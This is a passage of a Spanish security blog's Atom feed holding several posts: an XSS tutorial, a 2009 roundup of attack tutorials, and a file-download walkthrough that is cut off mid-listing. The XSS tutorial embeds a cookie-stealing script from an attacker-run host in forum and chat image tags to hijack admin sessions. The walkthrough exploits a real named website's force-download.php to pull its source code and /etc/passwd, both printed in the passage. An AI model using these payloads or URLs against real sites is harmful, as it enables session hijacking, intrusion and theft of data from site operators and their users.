href="http://www.seguridadblanca.org/2010/01/herramientas-que-facilitan-nuestro.html" title="Herramientas Que Facilitan Nuestro Trabajo - SB te los da, no lo pidas a los reyes magos ;)" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;A0MDQ3sycCp7ImA9WxBRFU4.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4481681355505204279</id><published>2010-01-03T08:09:00.000-08:00</published><updated>2010-01-03T09:24:32.598-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-03T09:24:32.598-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="csrf" /><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="cookie" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="xsrf" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><title>Procedimiento, Cuando un Xss se vuelve crítico.</title><content type="html">Empezando este año con una entrada que creo que les ayudará a ver desde otra perspectiva un xss, en esta ocación les voy a enseñar como explotar un Xss para poder entrar...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hace un tiempo escribí sobre como se hace para &lt;a href="http://www.seguridadblanca.org/2009/09/robando-cookies-con-un-xss.html"&gt;robar cookies con un xss&lt;/a&gt; y para los que se orientan con mi blog pues han de creer que yo enseñe robando masomenos con ingeniería social pero nosotros podemos hacer mas que eso... ahora les mostraré lo que podemos hacer...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;mm el código que usaremos es el stándar por asi decirlo que tenemos en la otra entrada pero lo vamos a complementar con otras cosas... ahora si, hay muchas maneras de como poder entrar como administrador a una web con un xss o xsrf y la primera es robandole la cookie al administrador o moderador con ingeniería social + un Foro Vulnerable...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Asi como hago yo ustedes cuando quieran ver si una app es vulnerable procuren descargarlo y buscar código con errores, en casi todas las entradas pongo ejemplos de como se ve un código con error, o si quieren busquen el bug en &lt;a href="http://www.exploit-db.com/"&gt;exploit-db&lt;/a&gt; y ver si existe un xss o csrf a explotar... ahora si a la acción...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tenemos nuestro Bug un Perfecto Xss para robar cookies está ubicado en el en el bbcode [img][/img] el problema con esto es que podemos poner cualquier tipo de imagen es decir jpg jpeg gif pero... php? mmm como podemos ver pregunté si se podía php, el php no es un tipo de imagen pero aun así los programadores cometieron ese error ahora a explotarlo, vamos a escribir una entrada, digamos en un foro de "hackers"...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tema: Nuevo 0day :o&lt;br /&gt;Content:&lt;br /&gt;&lt;br /&gt;[img=http://miwebhostingparahackear.com/robocookie.php][/img]&lt;br /&gt;&lt;br /&gt;Bueno amigos.................&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;EOF&lt;br /&gt;------------------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Listo como vemos acabamos de "ejecutar" nuestro código de robo de cookies y hemos comenzado a robar cookies  y lógico lo que esté escrito en el post debe ser convincente luego vamos a ver quienes han caido... no puede ser... tenemos 20 sessiones que nervios... probemos a ver si alguna es del administrador, ahora despues de probar 13 sessiones:&lt;br /&gt;&lt;br /&gt;Welcome Admin&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Listo ya teniendo la administración podemos subir una shell como theme, etc pero bueno ahora les voy a mostrar otra situación... hace unos días un amigo me comentó de un 0day muy curioso... era en un chat php...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;despues de analizar durante mucho rato el chat por que el no me quería decir del bug se me ocurrió ver los headers usando nuestro live http headers, y en el chat dijeron algo chistoso y yo use el emoticon "xD" y en eso vi que en uno de los headers post de los mensajes se veia algo como esto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;img src="http://www.webserver.com/chat/files/emoticon10.jpg&amp;gt;&amp;lt;/img&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;cuando lo vi dije no puede ser no creo que ese sea el bug...&lt;br /&gt;&lt;br /&gt;cambie &lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;img src="http://www.webserver.com/chat/files/emoticon10.jpg&amp;gt;&amp;lt;/img&amp;gt;&lt;br /&gt;&lt;/code&gt; &lt;br /&gt;&lt;br /&gt;por&lt;br /&gt;&lt;br /&gt;test123...&lt;br /&gt;&lt;br /&gt;y posteo eso intento lo primero con una redirección pero no aceptaba todos los tags entonces probe poner:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&amp;lt;img src="http://www.miwebhackeatodo.com/robo.php&amp;gt;&amp;lt;/img&amp;gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;salio una [x] en ves de imagen y mientras escribian en el chat yo me iva sacando todas las cookies... como se dan cuenta hay veces que los errores son pura investigación y curiosidad... lo único que hice fue probar un poco y salio, ustedes también pueden hacer esto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;yo hoy les he enseñando esto con la etiqueta img pero se puede con un iframe, hipervínculo de flash y todo lo que ustedes se imaginen...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;espero les sirva este tuto...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4481681355505204279?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/4481681355505204279/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4481681355505204279&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4481681355505204279?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4481681355505204279?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/procedimiento-cuando-un-xss-se-vuelve.html" title="Procedimiento, Cuando un Xss se vuelve crítico." /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DkQNQ3k6eip7ImA9WxBREko.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4738478060048140876</id><published>2009-12-31T06:39:00.000-08:00</published><updated>2009-12-31T07:46:32.712-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-31T07:46:32.712-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="arbitary download" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="zero bits" /><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="Sql Injection" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="BUG" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="full source disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="xsrf" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="htaccess" /><category scheme="http://www.blogger.com/atom/ns#" term="Bluetooth" /><title>Un Resumen del 2009</title><content type="html">Comenzamos un Año de los mas dificiles para todos los ámbitos la crisis afectó a todos el mejor ejemplo es que la &lt;a href="http://www.informatica64.com/DownloadFOCA/"&gt;foca&lt;/a&gt; ya no será gratis...já este año lectores hemos pasado alti bajos juntos y me alegra ver saber como ha crecido poco a poco el blog, dando pasos lentos pero seguros, hemos perdido amigos que empezaron con nosotros, ahora hay uno nuevo pero no queremos irnos para el lado sentimental, les pongo el resumen de este año...&lt;br /&gt;&lt;br /&gt;---------------------&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/06/pen-test-cambiando-de-user-agent.html"&gt;&lt;br /&gt;Aprendimos a Spoofear User-Agent&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/06/el-bluesnarfing.html"&gt;Aprendimos sobre el Bluesnarfing&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/06/pen-test-remote-code-execution.html"&gt;&lt;br /&gt;Aprendimos como funcionaba el Remote Code Execution&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/06/pen-test-full-path-disclosure.html"&gt;&lt;br /&gt;Aprendamos del Full Path Disclosure&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/06/configurando-el-htaccess.html"&gt;&lt;br /&gt;Aprendimos a Configurar un archivo htaccess&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Perverthso de &lt;a href="http://cuscosoft.com/"&gt;CuscoSoft&lt;/a&gt; nos enseñó &lt;a href="http://www.seguridadblanca.org/2009/06/pen-test-sql-inyeccion-by-perverths0.html"&gt;Sql Injection Básica&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jbyte de &lt;a href="http://jbyte-security.blogspot.com/"&gt;Jbyte-Security&lt;/a&gt; nos lo complementó con &lt;a href="http://www.seguridadblanca.org/2009/06/inyeccion-sql-en-microsoft-sql-server.html"&gt;Injection a Sql Server&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/07/pen-test-remote-file-inclusion-by.html"&gt;&lt;br /&gt;NitroNet Nos enseñó el Remote File Inclusion&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/07/explicacion-de-path-traversal.html"&gt;&lt;br /&gt;Explicando el Path Trasversal&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/08/pen-test-anti-hack-reverse-dns.html"&gt;&lt;br /&gt;Comenté un poco del Reverse DNS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/09/pen-test-mass-defacement.html"&gt;&lt;br /&gt;Ahora el Mass Defacemente&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/09/robando-cookies-con-un-xss.html"&gt;&lt;br /&gt;Robando Cookies con un Xss&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/09/cuidado-con-el-hijacking.html"&gt;&lt;br /&gt;El Hijacking&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/cross-site-tracing.html"&gt;&lt;br /&gt;Expliqué el Cross Site Tracing&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/log-in-bypass-sql-injection-isil.html"&gt;Aprendimos Login Bypass en el ISIL&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/vulnerando-tecsup_09.html"&gt;&lt;br /&gt;Encontramos Xss en Tecsup&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/fanatica-1-de-seguridadblanca.html"&gt;&lt;br /&gt;Nuestra Fanática&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/pentest-lfi-por-require.html"&gt;Vimos como se hacía Local Files Inclusion por Require()&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/pentest-explotacion-de-lfi-por-avatar.html"&gt;LFI por uploader&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/obtener-archivo-del-server-con-sql.html"&gt;&lt;br /&gt;Obtener Archivos del Servidor con Sql Injection&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/10/sql-injection-login-bypass-la.html"&gt;&lt;br /&gt;La Explicación de un Login Bypass&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/remote-code-execution-con-eval.html"&gt;&lt;br /&gt;Remote Code Execution con Eval&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/local-file-disclosure.html"&gt;&lt;br /&gt;Local File Disclosure&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/errores-en-autentificacion.html"&gt;&lt;br /&gt;Argument Injection&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/mi-exposicion-de-limahack.html"&gt;&lt;br /&gt;Mi Exposición del LimaHack&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/pentest-session-prediction.html"&gt;&lt;br /&gt;Explique el Session Prediction&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/session-fixation.html"&gt;&lt;br /&gt;Session Fixation&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/11/pentest-cross-site-request-forgery.html"&gt;&lt;br /&gt;Explique el XSRF&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/insecure-permissions.html"&gt;&lt;br /&gt;Insecure Permisions&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/orientacion-del-php-al-pentest-curl.html"&gt;&lt;br /&gt;Orientación del PHP al PenTest - CURL()&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/pentest-insecure-cookie-handling.html"&gt;&lt;br /&gt;Insecure Cookie Handling&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/nullbyte-poisoning.html"&gt;&lt;br /&gt;Nullbyte Poisoning&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/sql-injection-en-en-asp.html"&gt;&lt;br /&gt;Sql Injection en ASP Ejempo Real&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/full-path-disclosure-en-facebook.html"&gt;&lt;br /&gt;Descubrí un FPD en FaceBook&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/cookie-poisoning.html"&gt;&lt;br /&gt;Expliqué el Cookie Poisoning&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/tutorial-vulnerabilidad-csrf-by.html"&gt;&lt;br /&gt;XSRF de Zer-Bits&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.seguridadblanca.org/2009/12/arbitary-downloadfull-source-disclosure.html"&gt;&lt;br /&gt;Arbitrary Download + Full Source Disclosure de Zero-Bits&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero Este Resumen les haya gustado ahora con mucho gusto y agradecimiento les digo...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;Feliz Año Nuevo Que todo Sea bueno para Ustedes en todos los ámbitos, Espero no olviden seguridadblanca en el año que viene y esperamos el próximo año sea mejor para todos....&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;Happy Hacking =)&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4738478060048140876?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/4738478060048140876/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4738478060048140876&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4738478060048140876?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4738478060048140876?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2009/12/un-resumen-del-2009.html" title="Un Resumen del 2009" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;A0IER3c-eCp7ImA9WxBREUQ.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-9041994796466873258</id><published>2009-12-30T10:53:00.001-08:00</published><updated>2009-12-30T10:58:26.950-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-12-30T10:58:26.950-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="zero bits" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="diosdelared" /><category scheme="http://www.blogger.com/atom/ns#" term="full source disclosure" /><category scheme="http://www.blogger.com/atom/ns#" term="arbitary download" /><title>Arbitary Download+Full Source Disclosure</title><content type="html">Full Source Disclosure.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;0x01. Introducción&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;En DDLR ya algunos habrán leído mi tutorial sobre “Full Path Disclosure”, bueno, ahora les vengo hablar un poco de otra vulnerabilidad llamada “Full Source Disclosure” que ha estado un poco polémico en  #DDLR, gracias al video de 0o_Zeus_o0 muy bueno la verdad y el post de Gothic-x también excelente. &lt;br&gt;&lt;br /&gt;Esta vulnerabilidad ya la había leído un poco antes, pero bueno, les hare un tuto, viendo que muchos les intereso este tema.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;0x02. ¿Qué es Arbitrary Downloader y Full Source Disclosure o FSD?&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Arbitrary Downloader para descargar cualquier archivo del servidor junto con Full Source Disclosure que ve el CODIGO COMPLETO es una vulnerabilidad MUY vista por así decirlo todavía en la RED, y se encarga de descargar cualquier  fichero del servidor sin estar logeado o tener permiso alguno, y con esto podemos ver el CODIGO FUENTE (SOURCE) de este para sacar mucha información, pero no es lo mismo darle al index.php “VER CODIGO FUENTE” en tu navegador, que con verla en esta vulnerabilidad, ya que este muestra el código ORIGINAL del servidor.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Esta vulnerabilidad se debe a la mala programación de las variables especiales para descargar un archivo interno, permitiéndonos descargar cualquier archivo del servidor sin estar logeado o tener permisos como dije arriba.&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Gracias al DORK creado por Gothic-x podrán encontrar muchos websites vulnerables y también encontré uno para explicar en este tutorial.&lt;br&gt;&lt;br /&gt;&lt;font color="red"&gt;&lt;b&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;0x03. Practica&lt;/b&gt;&lt;/font&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;La web que usaremos de ejemplo seria esta: “http://www.favaloro.edu.ar”, el site de un medico argentino (Gracias KikoArg).&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;Primero me paso a descargar el “index” para que vean la diferencia entre “SOURCE DISCLOSURE” y “VER CODIGO FUENTE DESDE EL NAVEGADOR”:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;FULL SOURCE DISCLOSURE: &lt;/b&gt;&lt;br&gt;&lt;br /&gt;Pasamos hacer que el servidor nos descargue el index principal que sería:&lt;br&gt;&lt;br /&gt;http://www.favaloro.edu.ar/force-download.php?file=index.php&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Lo descargamos y lo abrimos con nuestro editor:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;a href="http://i34.tinypic.com/muzjhv.gif" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i34.tinypic.com/muzjhv.gif" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;b&gt;VER CODIGO FUENTE:&lt;/b&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;a href="http://i38.tinypic.com/5yayw3.jpg" target="_blank" onclick="window.open(this.href, this.target, 'width=800,height=600'); return false;"&gt;&lt;img src="http://i38.tinypic.com/5yayw3.jpg" style="max-width: 499px;"&gt;&lt;/a&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;No sale completo como pueden ver en la barra, pero igual pueden notar que es diferente muy diferente, por eso se le llama “FULL SOURCE”&lt;br&gt;&lt;br /&gt;Esta simple vulnerabilidad puede llegar a ser muy muy peligrosa, ya que podemos descargar “CUALQUIERRR” fichero del servidor, pero claro, poniendo el directorio hasta el fichero:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;http://localhost/descargas.php?file=config.php&lt;br&gt;&lt;br /&gt;http://localhost/descargas.php?file=/admin/datos.php&lt;br&gt;&lt;br /&gt;Ya queda de tu conocimiento de un servidor o para sacar datos, podemos usarlo si es que el servidor es vulnerable otra vulnerabilidad llamada “FULL PATH DISCLOSURE”, entre otras cosas.&lt;br&gt;&lt;br /&gt;Como vimos en el código fuente del “index.php” desde FULL SOURCE DISCLOSURE, podemos ver otros directorios donde podemos acceder y sacar muchas cosas como:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;br /&gt;inc/principal.php: &lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;&amp;lt;? require_once('cnx/cnx.php');&lt;br /&gt; $principal = "SELECT * FROM novedades WHERE (PortadaNovedades = 2) OR (PortadaNovedades = 3)  &lt;br /&gt;ORDER BY OrdenNovedades ASC LIMIT 0,5";&lt;br /&gt;$principal2 = mysql_query($principal,$link);&lt;br /&gt;?&amp;gt;&lt;br /&gt;&amp;lt;div id="content"&amp;gt; &lt;br /&gt;&amp;lt;div id="novedades"&amp;gt;&lt;br /&gt;&amp;lt;div id="carrera"&amp;gt;&lt;br /&gt;&amp;lt;div class="principal-foto"&amp;gt;&lt;br /&gt;&amp;lt;p class="quote-it"&amp;gt;&amp;lt;img src="images/favaloro3.jpg" align="left" /&amp;gt;&lt;br /&gt;&amp;amp;quot;A los j&amp;amp;oacute;venes les pido que entiendan que lo material  es temporario, lo que perdurar&amp;amp;aacute;&lt;br /&gt; para siempre ser&amp;amp;aacute;n los ideales y entre ellos la  gran convocatoria deber&amp;amp;iacute;a ser: &lt;br /&gt;educaci&amp;amp;oacute;n y desarrollo cient&amp;amp;iacute;fico en busca de  una sociedad en la que la equidad social sea lo prioritario&amp;amp;quot;.&amp;lt;/p&amp;gt;   &lt;br /&gt;&lt;br /&gt;&amp;lt;p class="allign-right"&amp;gt;  Dr. Ren&amp;amp;eacute; G. Favaloro, Tel Aviv, Israel, 1995&amp;lt;br /&amp;gt;&lt;br /&gt;   Fotografia: Miguel Angel Generoso&amp;lt;/p&amp;gt;&lt;br /&gt;  &amp;lt;/div&amp;gt;&lt;br /&gt; &amp;lt;div class="nov-box"&amp;gt; &amp;lt;h1&amp;gt;&amp;lt;/h1&amp;gt;&lt;br /&gt;&lt;br /&gt; &amp;lt;script src="Scripts/AC_RunActiveContent.js" type="text/javascript"&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&amp;lt;script type="text/javascript"&amp;gt;&lt;br /&gt;AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','645','height','140','src','images/banner_general_645x140-1009','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','movie','images/banner_general_645x140-1009' ); //end AC code&lt;br /&gt;&amp;lt;/script&amp;gt;&amp;lt;noscript&amp;gt;&amp;lt;object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="645" height="140"&amp;gt;&lt;br /&gt;&amp;lt;param name="movie" value="images/banner_general_645x140-1009.swf"&amp;gt;&lt;br /&gt;&amp;lt;param name="quality" value="high"&amp;gt;&lt;br /&gt;&amp;lt;embed src="images/banner_general_645x140-1009.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="645" height="140"&amp;gt;&amp;lt;/embed&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/object&amp;gt;&lt;br /&gt;&amp;lt;/noscript&amp;gt;&amp;lt;/div&amp;gt;    &lt;br /&gt;  &amp;lt;? &lt;br /&gt;while($principal3 = mysql_fetch_array($principal2)) {  &lt;br /&gt;echo "&amp;lt;div class=\"nov-box\"&amp;gt;";&lt;br /&gt;echo "&amp;lt;h1&amp;gt;".$principal3['TitulosNovedades']."&amp;lt;/h1&amp;gt;";&lt;br /&gt;echo "&amp;lt;p&amp;gt;".$principal3['CopeteNovedades']."&amp;lt;/p&amp;gt;";&lt;br /&gt;echo "&amp;lt;div class=\"nov-foot\"&amp;gt;&amp;lt;a href=\"";&lt;br /&gt;if ($principal3['LinkNovedades']=="") {    &lt;br /&gt;echo "?inc=novedades&amp;amp;IDNovedades=".$principal3['IDNovedades'];&lt;br /&gt;} else {&lt;br /&gt;echo $principal3['LinkNovedades'];&lt;br /&gt;}&lt;br /&gt;echo "\"&amp;gt;mas informaci&amp;amp;oacute;n&amp;lt;/a&amp;gt;&amp;lt;/div&amp;gt;";echo "&amp;lt;/div&amp;gt;";&lt;br /&gt;}?&amp;gt; &lt;br /&gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;Algunos se preguntaran si sirven otros archivos como “/etc/passwd”, pues si, ejemplo:&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;http://www.favaloro.edu.ar/force-download.php?file=/etc/passwd&lt;br&gt;&lt;br /&gt;&lt;br&gt;&lt;br /&gt;&lt;div class="px"&gt;&lt;pre width="70"&gt;root:x:0:0:root:/root:/bin/bash&lt;br /&gt;daemon:x:1:1:daemon:/usr/sbin:/bin/sh&lt;br /&gt;bin:x:2:2:bin:/bin:/bin/sh&lt;br /&gt;sys:x:3:3:sys:/dev:/bin/sh&lt;br /&gt;sync:x:4:65534:sync:/bin:/bin/sync&lt;br /&gt;games:x:5:60:games:/usr/games:/bin/sh&lt;br /&gt;man:x:6:12:man:/var/cache/man:/bin/sh&lt;br /&gt;lp:x:7:7:lp:/var/spool/lpd:/bin/sh&lt;br /&gt;mail:x:8:8:mail:/var/mail:/bin/sh&lt;br /&gt;news:x:9:9:news:/var/spool/news:/bin/sh&lt;br /&gt;uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh&lt;br /&gt;proxy:x:13:13:proxy:/bin:/bin/sh&lt;br /&gt;postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh&lt;br /&gt;www-data:x:33:33:www-data:/var/www:/bin/sh&lt;br /&gt;backup:x:34:34:backup:/var/backups:/bin/sh&lt;br /&gt;operator:x:37:37:Operator:/var:/bin/sh&lt;br /&gt;list:x:38:38:Mailing List Manager:/var/list:/bin/sh&lt;br /&gt;irc:x:39:39:ircd:/var/run/ircd:/bin/sh&lt;br /&gt;gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh&lt;br 